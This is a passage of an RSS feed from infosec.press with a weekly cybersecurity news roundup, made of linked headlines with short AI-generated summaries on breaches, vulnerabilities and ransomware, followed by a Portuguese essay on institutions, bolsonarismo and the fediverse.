and a significant erosion of digital rights.&#xA;https://www.theregister.com/2025/09/11/euchatcontrol/&#xA;&#xA;💻 Kids in the UK are hacking their own schools for dares and notoriety&#xA;cybercrime - The ICO reports that over half of personal data breaches in UK schools are caused by students, often through weak passwords and lax security practices.&#xA;https://techcrunch.com/2025/09/11/kids-in-the-uk-are-hacking-their-own-schools-for-dares-and-notoriety/&#xA;&#xA;🛡️ FTC opens inquiry into how AI chatbots impact child safety, privacy&#xA;privacy - The FTC is investigating how major tech companies protect children using AI chatbots, focusing on safety measures and privacy practices. This follows concerns over negative impacts, including a tragic suicide case linked to a chatbot.&#xA;https://therecord.media/ftc-opens-inquiry-ai-chatbots-kids&#xA;&#xA;⚠️ Apple issues spyware warnings as CERT&#xA;warning - Apple has issued alerts about a spyware campaign affecting iCloud-linked devices, confirmed by France&#39;s CERT-FR. Notifications indicate potential compromises, often involving sophisticated attacks with zero-day vulnerabilities.&#xA;https://securityaffairs.com/182129/malware/apple-issues-spyware-warnings-as-cert-fr-confirms-attacks.html&#xA;&#xA;🔒 Swiss government looks to undercut privacy tech, stoking fears of mass surveillance&#xA;privacy - The Swiss government plans to require service providers to collect IDs, retain user data for six months, and potentially disable encryption, raising concerns over mass surveillance and the impact on privacy tech companies.&#xA;https://therecord.media/switzerland-digital-privacy-law-proton-privacy-surveillance&#xA;&#xA;🔒 Samsung fixed actively exploited zero&#xA;vulnerability - Samsung patched the CVE-2025-21043 zero-day vulnerability, allowing remote code execution on Android devices. The flaw was exploited in attacks without user interaction, raising concerns over security.&#xA;https://securityaffairs.com/182135/hacking/samsung-fixed-actively-exploited-zero-day.html&#xA;&#xA;⚖️ Hacker convicted of extorting 20,000 psychotherapy victims walks free during appeal&#xA;cybercrime - Aleksanteri Kivimäki, convicted of extorting over 20,000 psychotherapy clients, was released on appeal while his case continues. The hack has deeply impacted Finnish society, with many victims still suffering.&#xA;https://therecord.media/finland-vastaamo-hacker-free-during-appeal-conviction&#xA;&#xA;🧺 Dutch students denied access to jailbroken laundry machines&#xA;security news - Over 1,250 University of Amsterdam students are without laundry services after a cyberattack compromised smart machines, allowing free washing. Management company Duwo refuses to restore the service due to costs.&#xA;https://www.theregister.com/2025/09/12/jailbrokenlaundrymachines/&#xA;&#xA;🔓 Vietnam, Panama governments suffer incidents leaking citizen data&#xA;data breach - Vietnam&#39;s National Credit Information Center suffered a data breach, with hackers claiming to have stolen 160 million records. Meanwhile, Panama&#39;s Ministry of Economy and Finance reported a cyberattack, with the INC ransomware gang claiming to have stolen 1.5 terabytes of data.&#xA;https://therecord.media/vietnam-cic-panama-finance-ministry-cyberattacks&#xA;&#xA;🚆 British rail passengers urged to stay on guard after hack signals failure&#xA;data breach - LNER warns passengers of a data breach involving a third-party supplier, exposing contact details and journey information. Customers are advised to be cautious of unsolicited communications, although no payment details were compromised.&#xA;https://www.bitdefender.com/en-us/blog/hotforsecurity/british-rail-passengers-hack-signals-failure&#xA;&#xA;---&#xA;Some More, For the Curious&#xA;🎢 Exploiting the Impossible: A Deep Dive into A Vulnerability Apple Deems Unexploitable&#xA;vulnerability - A deep dive reveals a race condition in Apple&#39;s file-copy API that could be exploited, challenging Apple&#39;s belief that it was unexploitable. This vulnerability poses significant security risks.&#xA;https://jhftss.github.io/Exploiting-the-Impossible/&#xA;&#xA;🐱‍👤 Break The Protective Shell Of Windows Defender With The Folder Redirect Technique&#xA;hacking write-up - This article details a method for exploiting Windows Defender&#39;s update mechanism through symbolic links, allowing attackers to control its execution folder and potentially disable the antivirus.&#xA;https://www.zerosalarium.com/2025/09/Break-Protective-Shell-Windows-Defender-Folder-Redirect-Technique-Symlink.html&#xA;&#xA;🔓 Hackers breached Salesloft ’s GitHub in March, and used stole tokens in a mass attack&#xA;security news - Salesloft&#39;s GitHub was breached by hackers who stole tokens, leading to a mass attack on major clients like Google and Cloudflare. Security measures are now in place after a lengthy detection delay.&#xA;https://securityaffairs.com/182002/hacking/hackers-breached-salesloft-s-github-in-march-and-used-stole-tokens-in-a-mass-attack.html&#xA;&#xA;💻 18 Popular Code Packages Hacked, Rigged to Steal Crypto – Krebs on Security&#xA;malware - Eighteen widely-used JavaScript packages were compromised to steal cryptocurrency after a developer was phished. Experts warn that such supply chain attacks could lead to more severe malware outbreaks.&#xA;https://krebsonsecurity.com/2025/09/18-popular-code-packages-hacked-rigged-to-steal-crypto/&#xA;&#xA;🕵️‍♂️ Detecting Active Directory Password-Spraying with a Honeypot Account&#xA;cyber defense - This article outlines a method to detect password-spraying attacks using a honeypot account, reducing false positives by monitoring logon attempts specifically associated with this account.&#xA;https://trustedsec.com/blog/detecting-password-spraying-with-a-honeypot-account&#xA;&#xA;🔧 Zero Day Initiative — The September 2025 Security Update Review&#xA;vulnerability - September updates include Adobe&#39;s fixes for 22 CVEs across various products, and Microsoft&#39;s 80 CVEs, featuring Critical vulnerabilities like remote code execution. No active exploitation noted.&#xA;https://www.thezdi.com/blog/2025/9/9/the-september-2025-security-update-review&#xA;&#xA;⚠️ SAP warns of high-severity vulnerabilities in multiple products&#xA;vulnerability - SAP has identified multiple high-severity vulnerabilities, including a critical flaw rated 10 in NetWeaver, allowing unauthenticated command execution. Immediate patching is advised to prevent exploitation.&#xA;https://arstechnica.com/security/2025/09/as-hackers-exploit-one-high-severity-sap-flaw-company-warns-of-3-more/&#xA;&#xA;🎓 The State of Ransomware in Education 2025&#xA;security research - Sophos&#39; study reveals evolving ransomware threats in education, highlighting phishing and exploited vulnerabilities as primary attack vectors. Recovery efforts decline while ransom demands and payments drop significantly, indicating growing resilience.&#xA;https://news.sophos.com/en-us/2025/09/10/the-state-of-ransomware-in-education-2025/&#xA;&#xA;😅 The npm incident frightened everyone, but ended up being nothing to fret about&#xA;cybercrime - An npm account compromise led to malicious code injection in popular packages, causing initial panic. However, the attack&#39;s impact was minimal, quickly contained, and the community&#39;s response proved effective.&#xA;https://cyberscoop.com/open-source-npm-package-attack/&#xA;&#xA;🐛 ChillyHell modular macOS malware OKed by Apple in 2021&#xA;malware - ChillyHell, a modular macOS backdoor that passed Apple&#39;s notarization, has likely infected systems undetected since 2021. Its advanced features include multiple persistence methods and command-and-control protocols.&#xA;https://www.theregister.com/2025/09/10/chillyhellmodularmacosmalware/&#xA;&#xA;🔍 Do we invest too much in risk assessments and too little in security?&#xA;cyber defense - Organizations should prioritize basic security controls over risk assessments. A structured approach involves establishing foundational security, followed by managed capabilities and risk-based enhancements to improve overall security posture.&#xA;https://safecontrols.blog/2025/09/10/do-we-invest-too-much-in-risk-assessments-and-too-little-in-security/&#xA;&#xA;☁️ VMSCAPE Spectre vulnerability leaks cloud secrets&#xA;vulnerability - ETH Zurich researchers have discovered the VMSCAPE vulnerability, a Spectre-based exploit that allows cloud users to leak secrets from the hypervisor on AMD and Intel CPUs without code changes. Software mitigations are required to address the issue.&#xA;https://www.theregister.com/2025/09/11/vmscapespectrevulnerability/&#xA;&#xA;🦠 SonicWall firewalls targeted by fresh Akira ransomware surge&#xA;cybercrime - Researchers warn of a surge in Akira ransomware attacks exploiting a year-old vulnerability in SonicWall firewalls. Improper configurations and failure to reset passwords have exacerbated the issue, with multiple organizations affected.&#xA;https://cyberscoop.com/sonicwall-akira-ransomware-attacks-surge/&#xA;&#xA;💻 HybridPetya ransomware dodges UEFI Secure Boot&#xA;malware - HybridPetya, a new ransomware strain, exploits a vulnerability to bypass UEFI Secure Boot on Windows systems. While currently a proof-of-concept, it demonstrates significant technical capabilities, including MFT encryption.&#xA;https://www.theregister.com/2025/09/12/hopefullyjustapoc_hybridpetya/&#xA;&#xA;---&#xA;CISA Corner&#xA;⚙️ CISA Releases Fourteen Industrial Control Systems Advisories&#xA;vulnerability - CISA issued fourteen advisories detailing vulnerabilities in various Industrial Control Systems, including multiple Rockwell Automation products. Users are urged to review these for mitigation strategies.&#xA;https://www.cisa.gov/news-events/alerts/2025/09/09/cisa-releases-fourteen-industrial-control-systems-advisories&#xA;⚙️ CISA Releases Eleven Industrial Control Systems Advisories&#xA;vulnerability - CISA issued eleven advisories on September 11, 2025, detailing vulnerabilities in various ICS products, primarily from Siemens and Schneider Electric. Users are urged to review these advisories for mitigation strategies.&#xA;https://www.cisa.gov/news-events/alerts/2025/09/11/cisa-releases-eleven-industrial-control-systems-advisories&#xA;&#xA;⚠️ CISA Adds One Known Exploited Vulnerability to Catalog&#xA;warning - CISA has added CVE-2025-5086, a deserialization vulnerability in Dassault Systèmes DELMIA Apriso, to its KEV Catalog due to active exploitation risks. Federal agencies are required to remediate identified vulnerabilities promptly.&#xA;https://www.cisa.gov/news-events/alerts/2025/09/11/cisa-adds-one-known-exploited-vulnerability-catalog&#xA;&#xA;---&#xA;While my intention is to pick news that everyone should know about, it still is what I think is significant, cool, fun...&#xA;Most of the articles are in English, but some current warnings might be in German.]]&gt;</description>
      <content:encoded><![CDATA[<p>A weekly shortlist of cyber security highlights.
The short summaries are AI generated! If something is wrong, please let me know!</p>

<hr>

<h3 id="highlight">Highlight</h3>

<p>🤞 We Got Lucky: The Supply Chain Disaster That Almost Happened
<em>No summary here, just a recommendation to read</em>
<a href="https://www.aikido.dev/blog/we-got-lucky-the-supply-chain-disaster-that-almost-happened" rel="nofollow">https://www.aikido.dev/blog/we-got-lucky-the-supply-chain-disaster-that-almost-happened</a></p>

<hr>

<h3 id="news-for-all">News For All</h3>

<p>💾 Signal introduces free and paid backup plans for your chats
<em>security news – Signal now allows users to back up chats for free and offers a paid plan for full media backups. This enhances its value for secure messaging amid privacy concerns.</em>
<a href="https://techcrunch.com/2025/09/08/signal-introduces-free-and-paid-backup-plans-for-your-chats/" rel="nofollow">https://techcrunch.com/2025/09/08/signal-introduces-free-and-paid-backup-plans-for-your-chats/</a></p>

<p>📺 Plex admits breach of account details, hashed passwords
<em>data breach – Plex has warned users to reset passwords after a breach potentially exposed emails, usernames, and hashed passwords. While credit card data wasn&#39;t compromised, this incident echoes previous breaches.</em>
<a href="https://www.theregister.com/2025/09/09/plex_breach/" rel="nofollow">https://www.theregister.com/2025/09/09/plex_breach/</a></p>

<p>🏋️‍♂️ Call audio from gym members, employees in open database
<em>data breach – An unprotected AWS database exposed sensitive audio recordings of gym members discussing personal and financial information. This raises concerns about potential identity theft and social engineering attacks.</em>
<a href="https://www.theregister.com/2025/09/09/gym_audio_recordings_exposed/" rel="nofollow">https://www.theregister.com/2025/09/09/gym_audio_recordings_exposed/</a></p>

<p>🔒 Apple says the iPhone 17 comes with a massive security upgrade
<em>security news – Apple&#39;s iPhone 17 features Memory Integrity Enforcement, an always-on security measure aimed at complicating spyware development, enhancing user protection.</em>
<a href="https://www.theverge.com/news/775234/iphone-17-air-a19-memory-integrity-enforcement-mte-security" rel="nofollow">https://www.theverge.com/news/775234/iphone-17-air-a19-memory-integrity-enforcement-mte-security</a></p>

<p>📱 Nepal lifts social media ban after deadly youth protests
<em>security news – Nepal has lifted a ban on social media platforms following violent protests that resulted in 29 deaths. The government faced criticism for the ban, deemed digital repression by rights groups.</em>
<a href="https://therecord.media/nepal-social-media-ban-lifted-after-deadly-protests" rel="nofollow">https://therecord.media/nepal-social-media-ban-lifted-after-deadly-protests</a></p>

<p>🚗 Jaguar Land Rover says data stolen in disruptive cyberattack
<em>data breach – Jaguar Land Rover reported a cyberattack that resulted in data theft and halted vehicle assembly lines. The extent of the stolen data and its impact on employees or customers remains unclear.</em>
<a href="https://techcrunch.com/2025/09/10/jaguar-land-rover-says-data-stolen-in-disruptive-cyberattack/" rel="nofollow">https://techcrunch.com/2025/09/10/jaguar-land-rover-says-data-stolen-in-disruptive-cyberattack/</a></p>

<p>🖼️ Google Online Security Blog: How Pixel and Android are bringing a new level of trust to your images with C2PA Content Credentials
<em>security news – Google&#39;s Pixel and Android devices now utilize C2PA Content Credentials to enhance image authenticity, providing users with verifiable trust in their images and combating misinformation.</em>
<a href="http://security.googleblog.com/2025/09/pixel-android-trusted-images-c2pa-content-credentials.html" rel="nofollow">http://security.googleblog.com/2025/09/pixel-android-trusted-images-c2pa-content-credentials.html</a></p>

<p>🔐 Brussels faces privacy crossroads over encryption backdoors
<em>privacy – Europe debates legislation requiring scanning of user content for child abuse, raising concerns over privacy and security. Critics argue it could lead to false accusations and a significant erosion of digital rights.</em>
<a href="https://www.theregister.com/2025/09/11/eu_chat_control/" rel="nofollow">https://www.theregister.com/2025/09/11/eu_chat_control/</a></p>

<p>💻 Kids in the UK are hacking their own schools for dares and notoriety
<em>cybercrime – The ICO reports that over half of personal data breaches in UK schools are caused by students, often through weak passwords and lax security practices.</em>
<a href="https://techcrunch.com/2025/09/11/kids-in-the-uk-are-hacking-their-own-schools-for-dares-and-notoriety/" rel="nofollow">https://techcrunch.com/2025/09/11/kids-in-the-uk-are-hacking-their-own-schools-for-dares-and-notoriety/</a></p>

<p>🛡️ FTC opens inquiry into how AI chatbots impact child safety, privacy
<em>privacy – The FTC is investigating how major tech companies protect children using AI chatbots, focusing on safety measures and privacy practices. This follows concerns over negative impacts, including a tragic suicide case linked to a chatbot.</em>
<a href="https://therecord.media/ftc-opens-inquiry-ai-chatbots-kids" rel="nofollow">https://therecord.media/ftc-opens-inquiry-ai-chatbots-kids</a></p>

<p>⚠️ Apple issues spyware warnings as CERT
<em>warning – Apple has issued alerts about a spyware campaign affecting iCloud-linked devices, confirmed by France&#39;s CERT-FR. Notifications indicate potential compromises, often involving sophisticated attacks with zero-day vulnerabilities.</em>
<a href="https://securityaffairs.com/182129/malware/apple-issues-spyware-warnings-as-cert-fr-confirms-attacks.html" rel="nofollow">https://securityaffairs.com/182129/malware/apple-issues-spyware-warnings-as-cert-fr-confirms-attacks.html</a></p>

<p>🔒 Swiss government looks to undercut privacy tech, stoking fears of mass surveillance
<em>privacy – The Swiss government plans to require service providers to collect IDs, retain user data for six months, and potentially disable encryption, raising concerns over mass surveillance and the impact on privacy tech companies.</em>
<a href="https://therecord.media/switzerland-digital-privacy-law-proton-privacy-surveillance" rel="nofollow">https://therecord.media/switzerland-digital-privacy-law-proton-privacy-surveillance</a></p>

<p>🔒 Samsung fixed actively exploited zero
<em>vulnerability – Samsung patched the CVE-2025-21043 zero-day vulnerability, allowing remote code execution on Android devices. The flaw was exploited in attacks without user interaction, raising concerns over security.</em>
<a href="https://securityaffairs.com/182135/hacking/samsung-fixed-actively-exploited-zero-day.html" rel="nofollow">https://securityaffairs.com/182135/hacking/samsung-fixed-actively-exploited-zero-day.html</a></p>

<p>⚖️ Hacker convicted of extorting 20,000 psychotherapy victims walks free during appeal
<em>cybercrime – Aleksanteri Kivimäki, convicted of extorting over 20,000 psychotherapy clients, was released on appeal while his case continues. The hack has deeply impacted Finnish society, with many victims still suffering.</em>
<a href="https://therecord.media/finland-vastaamo-hacker-free-during-appeal-conviction" rel="nofollow">https://therecord.media/finland-vastaamo-hacker-free-during-appeal-conviction</a></p>

<p>🧺 Dutch students denied access to jailbroken laundry machines
<em>security news – Over 1,250 University of Amsterdam students are without laundry services after a cyberattack compromised smart machines, allowing free washing. Management company Duwo refuses to restore the service due to costs.</em>
<a href="https://www.theregister.com/2025/09/12/jailbroken_laundry_machines/" rel="nofollow">https://www.theregister.com/2025/09/12/jailbroken_laundry_machines/</a></p>

<p>🔓 Vietnam, Panama governments suffer incidents leaking citizen data
<em>data breach – Vietnam&#39;s National Credit Information Center suffered a data breach, with hackers claiming to have stolen 160 million records. Meanwhile, Panama&#39;s Ministry of Economy and Finance reported a cyberattack, with the INC ransomware gang claiming to have stolen 1.5 terabytes of data.</em>
<a href="https://therecord.media/vietnam-cic-panama-finance-ministry-cyberattacks" rel="nofollow">https://therecord.media/vietnam-cic-panama-finance-ministry-cyberattacks</a></p>

<p>🚆 British rail passengers urged to stay on guard after hack signals failure
<em>data breach – LNER warns passengers of a data breach involving a third-party supplier, exposing contact details and journey information. Customers are advised to be cautious of unsolicited communications, although no payment details were compromised.</em>
<a href="https://www.bitdefender.com/en-us/blog/hotforsecurity/british-rail-passengers-hack-signals-failure" rel="nofollow">https://www.bitdefender.com/en-us/blog/hotforsecurity/british-rail-passengers-hack-signals-failure</a></p>

<hr>

<h3 id="some-more-for-the-curious">Some More, For the Curious</h3>

<p>🎢 Exploiting the Impossible: A Deep Dive into A Vulnerability Apple Deems Unexploitable
<em>vulnerability – A deep dive reveals a race condition in Apple&#39;s file-copy API that could be exploited, challenging Apple&#39;s belief that it was unexploitable. This vulnerability poses significant security risks.</em>
<a href="https://jhftss.github.io/Exploiting-the-Impossible/" rel="nofollow">https://jhftss.github.io/Exploiting-the-Impossible/</a></p>

<p>🐱‍👤 Break The Protective Shell Of Windows Defender With The Folder Redirect Technique
<em>hacking write-up – This article details a method for exploiting Windows Defender&#39;s update mechanism through symbolic links, allowing attackers to control its execution folder and potentially disable the antivirus.</em>
<a href="https://www.zerosalarium.com/2025/09/Break-Protective-Shell-Windows-Defender-Folder-Redirect-Technique-Symlink.html" rel="nofollow">https://www.zerosalarium.com/2025/09/Break-Protective-Shell-Windows-Defender-Folder-Redirect-Technique-Symlink.html</a></p>

<p>🔓 Hackers breached Salesloft ’s GitHub in March, and used stole tokens in a mass attack
<em>security news – Salesloft&#39;s GitHub was breached by hackers who stole tokens, leading to a mass attack on major clients like Google and Cloudflare. Security measures are now in place after a lengthy detection delay.</em>
<a href="https://securityaffairs.com/182002/hacking/hackers-breached-salesloft-s-github-in-march-and-used-stole-tokens-in-a-mass-attack.html" rel="nofollow">https://securityaffairs.com/182002/hacking/hackers-breached-salesloft-s-github-in-march-and-used-stole-tokens-in-a-mass-attack.html</a></p>

<p>💻 18 Popular Code Packages Hacked, Rigged to Steal Crypto – Krebs on Security
<em>malware – Eighteen widely-used JavaScript packages were compromised to steal cryptocurrency after a developer was phished. Experts warn that such supply chain attacks could lead to more severe malware outbreaks.</em>
<a href="https://krebsonsecurity.com/2025/09/18-popular-code-packages-hacked-rigged-to-steal-crypto/" rel="nofollow">https://krebsonsecurity.com/2025/09/18-popular-code-packages-hacked-rigged-to-steal-crypto/</a></p>

<p>🕵️‍♂️ Detecting Active Directory Password-Spraying with a Honeypot Account
<em>cyber defense – This article outlines a method to detect password-spraying attacks using a honeypot account, reducing false positives by monitoring logon attempts specifically associated with this account.</em>
<a href="https://trustedsec.com/blog/detecting-password-spraying-with-a-honeypot-account" rel="nofollow">https://trustedsec.com/blog/detecting-password-spraying-with-a-honeypot-account</a></p>

<p>🔧 Zero Day Initiative — The September 2025 Security Update Review
<em>vulnerability – September updates include Adobe&#39;s fixes for 22 CVEs across various products, and Microsoft&#39;s 80 CVEs, featuring Critical vulnerabilities like remote code execution. No active exploitation noted.</em>
<a href="https://www.thezdi.com/blog/2025/9/9/the-september-2025-security-update-review" rel="nofollow">https://www.thezdi.com/blog/2025/9/9/the-september-2025-security-update-review</a></p>

<p>⚠️ SAP warns of high-severity vulnerabilities in multiple products
<em>vulnerability – SAP has identified multiple high-severity vulnerabilities, including a critical flaw rated 10 in NetWeaver, allowing unauthenticated command execution. Immediate patching is advised to prevent exploitation.</em>
<a href="https://arstechnica.com/security/2025/09/as-hackers-exploit-one-high-severity-sap-flaw-company-warns-of-3-more/" rel="nofollow">https://arstechnica.com/security/2025/09/as-hackers-exploit-one-high-severity-sap-flaw-company-warns-of-3-more/</a></p>

<p>🎓 The State of Ransomware in Education 2025
<em>security research – Sophos&#39; study reveals evolving ransomware threats in education, highlighting phishing and exploited vulnerabilities as primary attack vectors. Recovery efforts decline while ransom demands and payments drop significantly, indicating growing resilience.</em>
<a href="https://news.sophos.com/en-us/2025/09/10/the-state-of-ransomware-in-education-2025/" rel="nofollow">https://news.sophos.com/en-us/2025/09/10/the-state-of-ransomware-in-education-2025/</a></p>

<p>😅 The npm incident frightened everyone, but ended up being nothing to fret about
<em>cybercrime – An npm account compromise led to malicious code injection in popular packages, causing initial panic. However, the attack&#39;s impact was minimal, quickly contained, and the community&#39;s response proved effective.</em>
<a href="https://cyberscoop.com/open-source-npm-package-attack/" rel="nofollow">https://cyberscoop.com/open-source-npm-package-attack/</a></p>

<p>🐛 ChillyHell modular macOS malware OKed by Apple in 2021
<em>malware – ChillyHell, a modular macOS backdoor that passed Apple&#39;s notarization, has likely infected systems undetected since 2021. Its advanced features include multiple persistence methods and command-and-control protocols.</em>
<a href="https://www.theregister.com/2025/09/10/chillyhell_modular_macos_malware/" rel="nofollow">https://www.theregister.com/2025/09/10/chillyhell_modular_macos_malware/</a></p>

<p>🔍 Do we invest too much in risk assessments and too little in security?
<em>cyber defense – Organizations should prioritize basic security controls over risk assessments. A structured approach involves establishing foundational security, followed by managed capabilities and risk-based enhancements to improve overall security posture.</em>
<a href="https://safecontrols.blog/2025/09/10/do-we-invest-too-much-in-risk-assessments-and-too-little-in-security/" rel="nofollow">https://safecontrols.blog/2025/09/10/do-we-invest-too-much-in-risk-assessments-and-too-little-in-security/</a></p>

<p>☁️ VMSCAPE Spectre vulnerability leaks cloud secrets
<em>vulnerability – ETH Zurich researchers have discovered the VMSCAPE vulnerability, a Spectre-based exploit that allows cloud users to leak secrets from the hypervisor on AMD and Intel CPUs without code changes. Software mitigations are required to address the issue.</em>
<a href="https://www.theregister.com/2025/09/11/vmscape_spectre_vulnerability/" rel="nofollow">https://www.theregister.com/2025/09/11/vmscape_spectre_vulnerability/</a></p>

<p>🦠 SonicWall firewalls targeted by fresh Akira ransomware surge
<em>cybercrime – Researchers warn of a surge in Akira ransomware attacks exploiting a year-old vulnerability in SonicWall firewalls. Improper configurations and failure to reset passwords have exacerbated the issue, with multiple organizations affected.</em>
<a href="https://cyberscoop.com/sonicwall-akira-ransomware-attacks-surge/" rel="nofollow">https://cyberscoop.com/sonicwall-akira-ransomware-attacks-surge/</a></p>

<p>💻 HybridPetya ransomware dodges UEFI Secure Boot
<em>malware – HybridPetya, a new ransomware strain, exploits a vulnerability to bypass UEFI Secure Boot on Windows systems. While currently a proof-of-concept, it demonstrates significant technical capabilities, including MFT encryption.</em>
<a href="https://www.theregister.com/2025/09/12/hopefully_just_a_poc_hybridpetya/" rel="nofollow">https://www.theregister.com/2025/09/12/hopefully_just_a_poc_hybridpetya/</a></p>

<hr>

<h3 id="cisa-corner">CISA Corner</h3>

<p>⚙️ CISA Releases Fourteen Industrial Control Systems Advisories
<em>vulnerability – CISA issued fourteen advisories detailing vulnerabilities in various Industrial Control Systems, including multiple Rockwell Automation products. Users are urged to review these for mitigation strategies.</em>
<a href="https://www.cisa.gov/news-events/alerts/2025/09/09/cisa-releases-fourteen-industrial-control-systems-advisories" rel="nofollow">https://www.cisa.gov/news-events/alerts/2025/09/09/cisa-releases-fourteen-industrial-control-systems-advisories</a>
⚙️ CISA Releases Eleven Industrial Control Systems Advisories
<em>vulnerability – CISA issued eleven advisories on September 11, 2025, detailing vulnerabilities in various ICS products, primarily from Siemens and Schneider Electric. Users are urged to review these advisories for mitigation strategies.</em>
<a href="https://www.cisa.gov/news-events/alerts/2025/09/11/cisa-releases-eleven-industrial-control-systems-advisories" rel="nofollow">https://www.cisa.gov/news-events/alerts/2025/09/11/cisa-releases-eleven-industrial-control-systems-advisories</a></p>

<p>⚠️ CISA Adds One Known Exploited Vulnerability to Catalog
<em>warning – CISA has added CVE-2025-5086, a deserialization vulnerability in Dassault Systèmes DELMIA Apriso, to its KEV Catalog due to active exploitation risks. Federal agencies are required to remediate identified vulnerabilities promptly.</em>
<a href="https://www.cisa.gov/news-events/alerts/2025/09/11/cisa-adds-one-known-exploited-vulnerability-catalog" rel="nofollow">https://www.cisa.gov/news-events/alerts/2025/09/11/cisa-adds-one-known-exploited-vulnerability-catalog</a></p>

<hr>

<p>While my intention is to pick news that everyone should know about, it still is what I think is significant, cool, fun...
Most of the articles are in English, but some current warnings might be in German.</p>
]]></content:encoded>
      <author>📰wrzlbrmpft&#39;s cyberlights💥</author>
      <guid>https://infosec.press/read/a/2gqygdyb23</guid>
      <pubDate>Sun, 14 Sep 2025 21:22:40 +0000</pubDate>
    </item>
    <item>
      <title>Animais artificiais</title>
      <link>https://infosec.press/sirius/animais-artificiais</link>
      <description>&lt;![CDATA[Destruição de Leviatã -gravura de Gustave Doré&#xA;!--more--&#xA;Outro dia desses estava lendo “homo bolsonarus” do Renato Lessa (disponibilizado de graça na rede) e uma das coisas que acho instigante no texto é a concepção de que o bolsonarismo é uma instituição. &#xA;&#xA;Lessa fala sobre como Hobbes observou a capacidade humana de produzir “animais artificiais”, que são as instituições. &#xA;&#xA;Nem todo animal artificial que criamos, por certo, precisa ser necessariamente uma besta perversa. Também é possível ver uma luta entre estes constructos animais (mas não no estilo duelo Pokemon). Inclusive estamos assistindo na atualidade as instituições oficiais do Judiciário e PGR (antes leniente sob o comando de Augusto Aras) combatendo a besta bolsonarista.&#xA;&#xA;Mas deixando de lado a atenção principal do texto do professor, o bolsonarismo, o que mais gostei foi a dica final, de que podemos criar outras instituições! E acrescento que nossos animais artificiais não necessitam ser estatais. &#xA;&#xA;O Poder Central é expressivo, mas também é limitado, uma instituição precisa mesmo é ter um “discurso forte”, capaz de reunir as pessoas em torno de convicções e crenças sólidas.&#xA;&#xA;Este fediverso, por exemplo, é a infraestrutura de uma instituição, de um animal artificial que criamos. Não é estatal, não criamos um Leviatã, nem é um passarinho ou uma borboleta, de propriedade capitalista. Alguns de nós chamam de mastodonte, mas sabemos que é maior que isso.&#xA;&#xA;Nesse caso específico, ademais, nós, que alimentamos nosso bichinho, precisamos tornar esse discurso mais forte para dar mais consistência às crenças que sustentam essa instituição (informação, diálogos, comunicação públicas, abertas, descentralizadas, etc.).&#xA;&#xA;Quando o bolsonarismo alcançou o Poder Executivo (além de parcela relevante das cadeiras do Congresso) por certo ele ganhou mais força e foram quatro anos sofridos, com direito a uma pandemia mundial para a besta fazer mais vítimas…&#xA;&#xA;Mas só conseguiu alcançar o executivo por ser uma instituição forte, independentemente do Poder Central, que canalizava as emoções e crenças de muitas pessoas! &#xA;&#xA;O poder parcial conquistado com a eleição e ascensão ao executivo federal teve também um aspecto limitador. A estrutura de Separação dos Poderes fez a criatura guinchar de ódio e se queixar que o Judiciário não a deixava desgovernar em paz… Até mesmo o Legislativo exigia muitas emendas e não admitia todas as vontades da besta.&#xA;&#xA;O que gostaria de ressaltar, contudo, é que estas experiências nos mostram que também podemos cristalizar nossas crenças em uma humanidade não alienada, não oprimida, livre do jugo do poder financeiro e da vigilância do capitalismo atual, por meio de novos constructos animais!&#xA;&#xA;Para tanto precisamos de união, cooperação, consenso, diálogo, respeito, técnica politica e, principalmente, praticar a experimentação e a criatividade.&#xA;&#xA;Comente este humilde ensaio aqui&#xA;&#xA;#instituições #fediverso #bolsonarismo]]&gt;</description>
      <content:encoded><![CDATA[<p><img src="https://upload.wikimedia.org/wikipedia/commons/thumb/9/9d/Destruction_of_Leviathan.png/1280px-Destruction_of_Leviathan.png" alt="Destruição de Leviatã -gravura de Gustave Doré">

Outro dia desses estava lendo “homo bolsonarus” do Renato Lessa (disponibilizado de graça na rede) e uma das coisas que acho instigante no texto é a concepção de que o bolsonarismo é uma instituição.</p>

<p>Lessa fala sobre como Hobbes observou a capacidade humana de produzir “animais artificiais”, que são as instituições.</p>

<p>Nem todo animal artificial que criamos, por certo, precisa ser necessariamente uma besta perversa. Também é possível ver uma luta entre estes constructos animais (mas não no estilo duelo Pokemon). Inclusive estamos assistindo na atualidade as instituições oficiais do Judiciário e PGR (antes leniente sob o comando de Augusto Aras) combatendo a besta bolsonarista.</p>

<p>Mas deixando de lado a atenção principal do texto do professor, o bolsonarismo, o que mais gostei foi a dica final, de que podemos criar outras instituições! E acrescento que nossos animais artificiais não necessitam ser estatais.</p>

<p>O Poder Central é expressivo, mas também é limitado, uma instituição precisa mesmo é ter um “discurso forte”, capaz de reunir as pessoas em torno de convicções e crenças sólidas.</p>

<p>Este fediverso, por exemplo, é a infraestrutura de uma instituição, de um animal artificial que criamos. Não é estatal, não criamos um Leviatã, nem é um passarinho ou uma borboleta, de propriedade capitalista. Alguns de nós chamam de mastodonte, mas sabemos que é maior que isso.</p>

<p>Nesse caso específico, ademais, nós, que alimentamos nosso bichinho, precisamos tornar esse discurso mais forte para dar mais consistência às crenças que sustentam essa instituição (informação, diálogos, comunicação públicas, abertas, descentralizadas, etc.).</p>

<p>Quando o bolsonarismo alcançou o Poder Executivo (além de parcela relevante das cadeiras do Congresso) por certo ele ganhou mais força e foram quatro anos sofridos, com direito a uma pandemia mundial para a besta fazer mais vítimas…</p>

<p>Mas só conseguiu alcançar o executivo por ser uma instituição forte, independentemente do Poder Central, que canalizava as emoções e crenças de muitas pessoas!</p>

<p>O poder parcial conquistado com a eleição e ascensão ao executivo federal teve também um aspecto limitador. A estrutura de Separação dos Poderes fez a criatura guinchar de ódio e se queixar que o Judiciário não a deixava desgovernar em paz… Até mesmo o Legislativo exigia muitas emendas e não admitia todas as vontades da besta.</p>

<p>O que gostaria de ressaltar, contudo, é que estas experiências nos mostram que também podemos cristalizar nossas crenças em uma humanidade não alienada, não oprimida, livre do jugo do poder financeiro e da vigilância do capitalismo atual, por meio de novos constructos animais!</p>

<p>Para tanto precisamos de união, cooperação, consenso, diálogo, respeito, técnica politica e, principalmente, praticar a experimentação e a criatividade.</p>

<p><a href="https://infosec.space/@sirius/115167602418508080" rel="nofollow">Comente este humilde ensaio aqui</a></p>

<p>#instituições #fediverso #bolsonarismo</p>
]]></content:encoded>
      <author>Sirius</author>
      <guid>https://infosec.press/read/a/va0ef4voac</guid>
      <pubDate>Mon, 08 Sep 2025 07:39:48 +0000</pubDate>
    </item>
    <item>
      <title>cyberlights - week 35/2025</title>
      <link>https://infosec.press/wrzlbrmpfts-cyberlights/cyberlights-week-35-2025</link>
